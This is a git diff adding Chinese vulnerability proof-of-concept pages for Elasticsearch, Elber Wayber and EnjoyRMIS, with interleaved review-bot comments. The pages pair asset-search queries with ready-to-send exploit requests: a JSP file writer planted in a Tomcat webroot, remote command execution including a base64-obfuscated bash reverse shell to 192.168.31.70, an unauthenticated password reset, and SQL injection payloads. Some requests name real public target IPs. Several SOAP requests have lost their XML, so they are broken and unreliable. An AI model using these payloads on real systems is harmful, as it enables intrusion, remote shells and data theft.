@@ -0,0 +1,109 @@ +# Elasticsearch存在任意文件写入漏洞 + +# 一、漏洞描述 +Elasticsearch向使用者提供执行脚本代码的功能,支持mvel, js,groovy,python,和native语言,默认脚本语言为mvel。Elasticsearch存在任意文件写入漏洞 + +# 二、影响版本 +Elasticsearch + +# 三、资产测绘 +```plain +app="Elasticsearch" +``` + +![1730009233361-9686bf63-9f51-42ac-819e-9bd09b99b929.png](./img/QnkKANvHTfXRP0Kk/1730009233361-9686bf63-9f51-42ac-819e-9bd09b99b929-807804.png) + +# 三、漏洞复现 +1、创建一个恶意索引文档 + +```plain +POST /a.jsp/a.jsp/1 HTTP/1.1 +Host: 123.58.224.8:32565 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: settingStore=1630480512401_0 +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 +Content-Type: application/x-www-form-urlencoded +Content-Length: 228 + +{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"} +``` + +![1730010630201-6d1b0034-4b48-4e50-8a3b-631b7d52e123.png](./img/QnkKANvHTfXRP0Kk/1730010630201-6d1b0034-4b48-4e50-8a3b-631b7d52e123-859650.png) + +2、再创建一个恶意的存储库,其中location的值即为要写入的路径(需要根据肉鸡的tomcat的www目录来决定) + +```plain +PUT /_snapshot/a.jsp HTTP/1.1 +Host: 123.58.224.8:32565 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: settingStore=1630480512401_0 +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 +Content-Type: application/x-www-form-urlencoded +Content-Length: 107 + +{ +"type": "fs", +"settings": { +"location": 
"/usr/local/tomcat/webapps/wwwroot/", +"compress": false +} +} +``` + +![1730010641746-77a29c62-63cd-4336-9313-f7deca4e6370.png](./img/QnkKANvHTfXRP0Kk/1730010641746-77a29c62-63cd-4336-9313-f7deca4e6370-688334.png) + +3、存储库验证并创建 + +```plain +PUT /_snapshot/a.jsp/a.jsp HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: settingStore=1630480512401_0 +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 +Content-Type: application/x-www-form-urlencoded +Content-Length: 102 + +{ + "indices": "a.jsp", + "ignore_unavailable": "true", + "include_global_state": false +} +``` + +![1730010655294-9e9d90a8-fd4a-4c75-93d0-ef003dc37487.png](./img/QnkKANvHTfXRP0Kk/1730010655294-9e9d90a8-fd4a-4c75-93d0-ef003dc37487-616035.png) + +4、写入jsp文件,这个jsp的文件是通过8080来访问的 + +```plain +/wwwroot/indices/a.jsp/snapshot-a.jsp?f=success +``` + +![1730010687125-d3c494d0-8f7e-4c6c-990f-b97eac530d42.png](./img/QnkKANvHTfXRP0Kk/1730010687125-d3c494d0-8f7e-4c6c-990f-b97eac530d42-084669.png) + +5、在www根目录下会生成一个test.jsp的文件,并会成功被写入success + +```plain +/wwwroot/test.jsp +``` + +![1730010705354-9724ef91-05da-4b8f-ae5d-41aae14d3c46.png](./img/QnkKANvHTfXRP0Kk/1730010705354-9724ef91-05da-4b8f-ae5d-41aae14d3c46-559091.png) + + + +> 更新: 2024-11-27 10:04:43 +> 原文: \ No newline at end of file diff --git a/Elasticsearch存在未授权访问导致的RCE.md b/Elasticsearch存在未授权访问导致的RCE.md new file mode 100644 index 0000000..a00db72 --- /dev/null +++ b/Elasticsearch存在未授权访问导致的RCE.md 
@@ -0,0 +1,119 @@ +# Elasticsearch存在未授权访问导致的RCE + +# 一、漏洞描述 +Elasticsearch向使用者提供执行脚本代码的功能,支持mvel, js,groovy,python,和native语言,默认脚本语言为mvel。由于mvel语言功能较为强大,可以直接执行java代码,而且官方默认没有关闭用户可通过http操控这一功能的接口(script.disable_dynamic),从而导致恶意用户可以通过这个功能远程执行任意Java代码。 + +# 二、影响版本 +Elasticsearch + +# 三、资产测绘 +```plain +app="Elasticsearch" +``` + +![1730009233361-9686bf63-9f51-42ac-819e-9bd09b99b929.png](./img/TxmiYf429ZjwRJZL/1730009233361-9686bf63-9f51-42ac-819e-9bd09b99b929-467988.png) + +# 三、漏洞复现 +1、利用该漏洞要求Elasticsearch中有数据,所以先创建一条数据 + +```plain +POST /website/blog/ HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 31 + +{ + "name": "colleget" +} +``` + +![1730009268228-6be55838-f010-42a4-af81-58585f9a0c3b.png](./img/TxmiYf429ZjwRJZL/1730009268228-6be55838-f010-42a4-af81-58585f9a0c3b-040576.png) + +2、执行命令 + +```plain +POST /_search?pretty HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 372 + +{ + "size": 1, + "query": { + "filtered": { + "query": { + "match_all": { + } + } + } + }, + "script_fields": { + "command": { + "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"whoami\").getInputStream()).useDelimiter(\"\\\\A\").next();" + } + } +} + } +} +``` + 
+![1730009338548-ecd2b298-f883-4d55-a4f4-f1f9a5899149.png](./img/TxmiYf429ZjwRJZL/1730009338548-ecd2b298-f883-4d55-a4f4-f1f9a5899149-827979.png) + +3、反弹shell + +```plain +POST /_search?pretty HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 372 + +{ + "size": 1, + "query": { + "filtered": { + "query": { + "match_all": { + } + } + } + }, + "script_fields": { + "command": { + "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"bash -c {echo,YmFaaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjcwLzc1MzIgMD4mMQ==}|{base64,-d}|{bash,-i}\").getInputStream()).useDelimiter(\"\\\\A\").next();" + } + } +} + } +} + +``` + +![1730009417293-ec63d02a-a5e8-4a7d-b995-fdeec28609ca.png](./img/TxmiYf429ZjwRJZL/1730009417293-ec63d02a-a5e8-4a7d-b995-fdeec28609ca-440486.png) + +![1730009433078-7c95d622-3e9c-42d4-b0f8-62007c8a37a9.png](./img/TxmiYf429ZjwRJZL/1730009433078-7c95d622-3e9c-42d4-b0f8-62007c8a37a9-907022.png) + + + +> 更新: 2024-11-27 10:04:43 +> 原文: \ No newline at end of file diff --git a/Elber-Wayber模拟数字音频密码重置漏洞.md b/Elber-Wayber模拟数字音频密码重置漏洞.md new file mode 100644 index 0000000..bc9dac9 --- /dev/null +++ b/Elber-Wayber模拟数字音频密码重置漏洞.md 
@@ -0,0 +1,23 @@ +# Elber-Wayber模拟数字音频密码重置漏洞 + +**Elber wavber 模拟/数字音频系统,存在一个严重的 安全漏洞只,该漏洞位于系统的密码重置功能中。攻击者可以通过利用此漏洞。绕过正常的身份验证流程,直接重置用户密码,从而非法获取系统访问权限。一旦攻击者成功重置密码,他们可以登录系统并完全接管控制权,进而窃取敏感数据、篡改系统设置或进行其他恶意操作。** + +## fofa + +```javascript +title="Elber Satellite Equipment" || body="www.elber.it" +``` + +## poc + +```javascript +GET /json_data/set_pwd?lev=2&pass=admin1234 HTTP/1.1 +Content-Type: application/json +Host: +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502131416179.webp) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/GnuI11tY3AHG9jEh3J4aDQ \ No newline at end of file diff --git a/EnjoyRMISEnjoyRMIS_WS存在目录遍历漏洞.md b/EnjoyRMISEnjoyRMIS_WS存在目录遍历漏洞.md new file mode 100644 index 0000000..ba31764 --- /dev/null +++ b/EnjoyRMISEnjoyRMIS_WS存在目录遍历漏洞.md @@ -0,0 +1,25 @@ +# EnjoyRMIS EnjoyRMIS_WS存在目录遍历漏洞 + +# 一、漏洞简介 +EnjoyRMIS EnjoyRMIS_WS存在目录遍历漏洞,攻击者可通过该漏洞获取敏感信息。 + +# 二、影响版本 ++ EnjoyRMIS + +# 三、资产测绘 ++ hunter`web.body="CheckSilverlightInstalled"` ++ 特征 + +![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/5qZ8mzexskqycRpJ/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-239798.png) + +# 四、漏洞复现 +```plain +/EnjoyRMIS_WS/ +``` + +![1700643269655-e01879c0-6074-41bd-91ca-a2df4dd47dbe.png](./img/5qZ8mzexskqycRpJ/1700643269655-e01879c0-6074-41bd-91ca-a2df4dd47dbe-453986.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/EnjoyRMISGetChildGroupSql1存在SQL注入漏洞.md b/EnjoyRMISGetChildGroupSql1存在SQL注入漏洞.md new file mode 100644 index 0000000..7c37f0c --- /dev/null +++ b/EnjoyRMISGetChildGroupSql1存在SQL注入漏洞.md 
@@ -0,0 +1,59 @@ +# EnjoyRMIS GetChildGroupSql1存在SQL注入漏洞 + +# 一、漏洞简介 +EnjoyRMIS GetChildGroupSql1存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至可控制服务器。 + +# 二、影响版本 ++ EnjoyRMIS + +# 三、资产测绘 ++ hunter`web.body="CheckSilverlightInstalled"` ++ 特征 + +![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/jWjV8uVque7i9zbw/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-060256.png) + +# 四、漏洞复现 +```plain +POST /EnjoyRMIS_WS/WS/ReportTool/cwsqry.asmx HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetChildGroupSql1" + + + + + + 1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(select @@version),NULL,NULL-- jhpF + + + +``` + +![1700643625811-3b3425fa-909f-411b-8d72-d46fe7c0c397.png](./img/jWjV8uVque7i9zbw/1700643625811-3b3425fa-909f-411b-8d72-d46fe7c0c397-123468.png) + +sqlmap + +```plain +POST /EnjoyRMIS_WS/WS/ReportTool/cwsqry.asmx HTTP/1.1 +Host: 120.78.175.218:8008 +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetChildGroupSql1" + + + + + + 1 + + + +``` + +![1700643507730-28f5a0db-3d0c-40ea-9e13-8c97909a8163.png](./img/jWjV8uVque7i9zbw/1700643507730-28f5a0db-3d0c-40ea-9e13-8c97909a8163-133965.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/EnjoyRMISGetOAById存在SQL注入漏洞.md b/EnjoyRMISGetOAById存在SQL注入漏洞.md new file mode 100644 index 0000000..c3d7d75 --- /dev/null +++ b/EnjoyRMISGetOAById存在SQL注入漏洞.md 
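Review bot: both request blocks in the GetChildGroupSql1 file have lost their XML: only the parameter value and blank lines remain where the SOAP envelope and `GetChildGroupSql1` element stood, so neither block is a valid request and the hunk does not document what it claims to. The second block also carries a concrete public `Host: 120.78.175.218:8008`, unlike the `xx.xx.xx.xx` placeholder used in the first block; redact it. `Content-Length: length` is an unmarked placeholder, and the 漏洞简介 claim 甚至可控制服务器 is not supported by the evidence shown, which is a `@@version` string.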
@@ -0,0 +1,59 @@ +# EnjoyRMIS GetOAById存在SQL注入漏洞 + +# 一、漏洞简介 +EnjoyRMIS GetOAById存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至可控制服务器。 + +# 二、影响版本 ++ EnjoyRMIS + +# 三、资产测绘 ++ hunter`web.body="CheckSilverlightInstalled"` ++ 特征 + +![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/4X5X0Jwq8Umbb0L0/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-537066.png) + +# 四、漏洞复现 +```plain +POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetOAById" + + + + + + string' AND 8448 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8448=8448) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(113)+CHAR(113))) AND 'OFyo'='OFyo + + + +``` + +![1700644019370-8d33a405-91e7-4c16-86af-0b666f3d946e.png](./img/4X5X0Jwq8Umbb0L0/1700644019370-8d33a405-91e7-4c16-86af-0b666f3d946e-534846.png) + +sqlmap + +```plain +POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetOAById" + + + + + + string + + + +``` + +![1700644052319-929933e6-1c3c-4186-8449-0e4ce469a7f9.png](./img/4X5X0Jwq8Umbb0L0/1700644052319-929933e6-1c3c-4186-8449-0e4ce469a7f9-554815.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/EnjoyRMISGetOCashById存在SQL注入漏洞.md b/EnjoyRMISGetOCashById存在SQL注入漏洞.md new file mode 100644 index 0000000..9f0927e --- /dev/null +++ b/EnjoyRMISGetOCashById存在SQL注入漏洞.md 
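Review bot: the GetOAById hunk has the same stripped-envelope problem: the body shows only `string' AND 8448 IN (...)` between blank lines, with the SOAP envelope and element names lost, so the request is incomplete as documented. This is the first of six near-identical files (GetOAById, GetOCashById, GetOCgpById, GetOCountById, GetOCpById, GetODById) that all target `/EnjoyRMIS_WS/WS/POS/cwsoa.asmx` and differ only in `SOAPAction`; one file listing the affected operations would be easier to maintain and to map to a single fix. The 影响版本 section names no version and the `> 原文:` footer is empty.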
@@ -0,0 +1,59 @@ +# EnjoyRMIS GetOCashById存在SQL注入漏洞 + +# 一、漏洞简介 +EnjoyRMIS GetOCashById存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至可控制服务器。 + +# 二、影响版本 ++ EnjoyRMIS + +# 三、资产测绘 ++ hunter`web.body="CheckSilverlightInstalled"` ++ 特征 + +![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/vYTtwPaoO6SfICoc/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-467876.png) + +# 四、漏洞复现 +```plain +POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetOCashById" + + + + + + string' AND 2187 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (2187=2187) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'uXof'='uXof + + + +``` + +![1700644453166-5bba5c8c-2b5d-4e26-b6b6-2d7a657b2f5c.png](./img/vYTtwPaoO6SfICoc/1700644453166-5bba5c8c-2b5d-4e26-b6b6-2d7a657b2f5c-009235.png) + +sqlmap + +```plain +POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetOCashById" + + + + + + string + + + +``` + +![1700644483934-6e89b9f0-7ece-400a-81b5-b7092b2fae79.png](./img/vYTtwPaoO6SfICoc/1700644483934-6e89b9f0-7ece-400a-81b5-b7092b2fae79-412026.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/EnjoyRMISGetOCgpById存在SQL注入漏洞.md b/EnjoyRMISGetOCgpById存在SQL注入漏洞.md new file mode 100644 index 0000000..10253db --- /dev/null +++ b/EnjoyRMISGetOCgpById存在SQL注入漏洞.md 
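Review bot: GetOCashById repeats the cwsoa.asmx pattern with the SOAP envelope missing from both request blocks and a boolean-based marker payload as the only evidence; the 漏洞简介 wording 甚至可控制服务器 goes beyond what that evidence shows. The `sqlmap` heading sits over a raw request with no explanation of how it was used, and `Content-Length: length` is an unmarked placeholder.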
@@ -0,0 +1,59 @@ +# EnjoyRMIS GetOCgpById存在SQL注入漏洞 + +# 一、漏洞简介 +EnjoyRMIS GetOCgpById存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至可控制服务器。 + +# 二、影响版本 ++ EnjoyRMIS + +# 三、资产测绘 ++ hunter`web.body="CheckSilverlightInstalled"` ++ 特征 + +![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/GfI4zHk7XLRH5lUG/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-108238.png) + +# 四、漏洞复现 +```plain +POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetOCgpById" + + + + + + string' AND 6111 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6111=6111) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'jixc'='jixc + + + +``` + +![1700644680316-9238d3b5-49e4-4ac1-8c7f-48746ef5b248.png](./img/GfI4zHk7XLRH5lUG/1700644680316-9238d3b5-49e4-4ac1-8c7f-48746ef5b248-476359.png) + +sqlmap + +```plain +POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetOCgpById" + + + + + + string + + + +``` + +![1700644702977-4c4ea727-688c-4e29-a052-613453b580d4.png](./img/GfI4zHk7XLRH5lUG/1700644702977-4c4ea727-688c-4e29-a052-613453b580d4-478747.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/EnjoyRMISGetOCountById存在SQL注入漏洞.md b/EnjoyRMISGetOCountById存在SQL注入漏洞.md new file mode 100644 index 0000000..c7b7d61 --- /dev/null +++ b/EnjoyRMISGetOCountById存在SQL注入漏洞.md 
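Review bot: GetOCgpById is a copy of the cwsoa.asmx file with a different `SOAPAction` and marker values; the SOAP envelope is again stripped from both blocks, the affected-version section gives no version, and the footer's 原文 is empty. Consider folding it into a single cwsoa.asmx entry rather than maintaining six files whose text is identical apart from the operation name.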
@@ -0,0 +1,59 @@ +# EnjoyRMIS GetOCountById存在SQL注入漏洞 + +# 一、漏洞简介 +EnjoyRMIS GetOCountById存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至可控制服务器。 + +# 二、影响版本 ++ EnjoyRMIS + +# 三、资产测绘 ++ hunter`web.body="CheckSilverlightInstalled"` ++ 特征 + +![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/-3EM53KFP-oCpuOA/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-012616.png) + +# 四、漏洞复现 +```plain +POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetOCountById" + + + + + + string' AND 8494 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (8494=8494) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113))) AND 'PDAF'='PDAF + + + +``` + +![1700644829789-6c2f4976-77e4-48f8-8a32-d8c69fa73016.png](./img/-3EM53KFP-oCpuOA/1700644829789-6c2f4976-77e4-48f8-8a32-d8c69fa73016-290198.png) + +sqlmap + +```plain +POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetOCountById" + + + + + + string + + + +``` + +![1700644943219-a87f98e3-c3f0-4d3a-95f2-5b6d4eae0dac.png](./img/-3EM53KFP-oCpuOA/1700644943219-a87f98e3-c3f0-4d3a-95f2-5b6d4eae0dac-124917.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/EnjoyRMISGetOCpById存在SQL注入漏洞.md b/EnjoyRMISGetOCpById存在SQL注入漏洞.md new file mode 100644 index 0000000..c29cfe2 --- /dev/null +++ b/EnjoyRMISGetOCpById存在SQL注入漏洞.md 
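Review bot: GetOCountById: the request body has lost its XML envelope, so what remains between the headers and the closing fence is not a SOAP request; the description's 甚至可控制服务器 is not supported by the boolean marker shown; no product version is given. Same consolidation suggestion as for the other cwsoa.asmx operations.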
@@ -0,0 +1,59 @@ +# EnjoyRMIS GetOCpById存在SQL注入漏洞 + +# 一、漏洞简介 +EnjoyRMIS GetOCpById存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至可控制服务器。 + +# 二、影响版本 ++ EnjoyRMIS + +# 三、资产测绘 ++ hunter`web.body="CheckSilverlightInstalled"` ++ 特征 + +![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/7G5cfT60yTl1WE3D/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-619455.png) + +# 四、漏洞复现 +```plain +POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetOCpById" + + + + + + string' AND 9068 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9068=9068) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(107)+CHAR(113))) AND 'kNzW'='kNzW + + + +``` + +![1700645106150-d7a06c88-1022-40b1-add9-f30ac12c3621.png](./img/7G5cfT60yTl1WE3D/1700645106150-d7a06c88-1022-40b1-add9-f30ac12c3621-126759.png) + +sqlmap + +```plain +POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetOCpById" + + + + + + string + + + +``` + +![1700645126934-9d93850e-de88-4f90-8152-f31c638c3f10.png](./img/7G5cfT60yTl1WE3D/1700645126934-9d93850e-de88-4f90-8152-f31c638c3f10-995088.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/EnjoyRMISGetODById存在SQL注入漏洞.md b/EnjoyRMISGetODById存在SQL注入漏洞.md new file mode 100644 index 0000000..9fbda4d --- /dev/null +++ b/EnjoyRMISGetODById存在SQL注入漏洞.md 
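Review bot: GetOCpById: envelope stripped from both request blocks, `Content-Length: length` left as an unmarked placeholder, no version in 影响版本, empty `> 原文:` footer, and an impact claim (控制服务器) beyond the evidence. Nothing here differs from GetOAById except the `SOAPAction` and the marker digits, which argues for one consolidated file.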
@@ -0,0 +1,59 @@ +# EnjoyRMIS GetODById存在SQL注入漏洞 + +# 一、漏洞简介 +EnjoyRMIS GetODById存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至可控制服务器。 + +# 二、影响版本 ++ EnjoyRMIS + +# 三、资产测绘 ++ hunter`web.body="CheckSilverlightInstalled"` ++ 特征 + +![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/EoBtxnlAiXH-mJkc/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-021809.png) + +# 四、漏洞复现 +```plain +POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetODById" + + + + + + string' AND 8733 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (8733=8733) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(107)+CHAR(113))) AND 'atoN'='atoN + + + +``` + +![1700645309721-be2c91f3-6e6d-4708-a6b9-f1ba12fd61da.png](./img/EoBtxnlAiXH-mJkc/1700645309721-be2c91f3-6e6d-4708-a6b9-f1ba12fd61da-760939.png) + +sqlmap + +```plain +POST /EnjoyRMIS_WS/WS/POS/cwsoa.asmx HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetODById" + + + + + + string + + + +``` + +![1700645332683-1eb00249-966d-49ac-9671-ef88f1c65b79.png](./img/EoBtxnlAiXH-mJkc/1700645332683-1eb00249-966d-49ac-9671-ef88f1c65b79-775568.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/EnjoyRMISGetOSpById存在SQL注入漏洞.md b/EnjoyRMISGetOSpById存在SQL注入漏洞.md new file mode 100644 index 0000000..1e783fe --- /dev/null +++ b/EnjoyRMISGetOSpById存在SQL注入漏洞.md 
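Review bot: GetODById: same stripped SOAP envelope in both blocks, same unmarked `Content-Length: length`, same missing version and empty 原文 footer as the other cwsoa.asmx files. The `sqlmap` section again shows only the unmodified request and a screenshot, so the text alone does not explain what was verified.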
@@ -0,0 +1,42 @@ +# EnjoyRMIS GetOSpById存在SQL注入漏洞 + +# 一、漏洞简介 +EnjoyRMIS存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息甚至可控制服务器。 + +# 二、影响版本 ++ EnjoyRMIS + +# 三、资产测绘 ++ hunter`web.body="CheckSilverlightInstalled"` ++ 特征 + +![1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89.png](./img/OEK9tkHunYY08in-/1700576375104-73ed7b01-1186-48d1-a163-ef4068a88d89-970499.png) + +# 四、漏洞复现 +```plain +POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: text/xml; charset=utf-8 +Content-Length: length +SOAPAction: "http://tempuri.org/GetOSpById" + + + + + + string' UNION SELECT NULL,NULL,NULL,NULL,(select @@version),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YQmj + + + +``` + +![1700576430999-14827fbf-6822-4dd6-a406-10bab39365a4.png](./img/OEK9tkHunYY08in-/1700576430999-14827fbf-6822-4dd6-a406-10bab39365a4-024610.png) + +sqlmap + +![1700576440841-41c461df-14f0-4f7d-92c9-eb8d6faa0e2b.png](./img/OEK9tkHunYY08in-/1700576440841-41c461df-14f0-4f7d-92c9-eb8d6faa0e2b-231689.png) + + + +> 更新: 2024-02-29 23:55:45 +> 原文: \ No newline at end of file diff --git a/EyouCMS文件包含RCE漏洞.md b/EyouCMS文件包含RCE漏洞.md new file mode 100644 index 0000000..a405ee7 --- /dev/null +++ b/EyouCMS文件包含RCE漏洞.md 
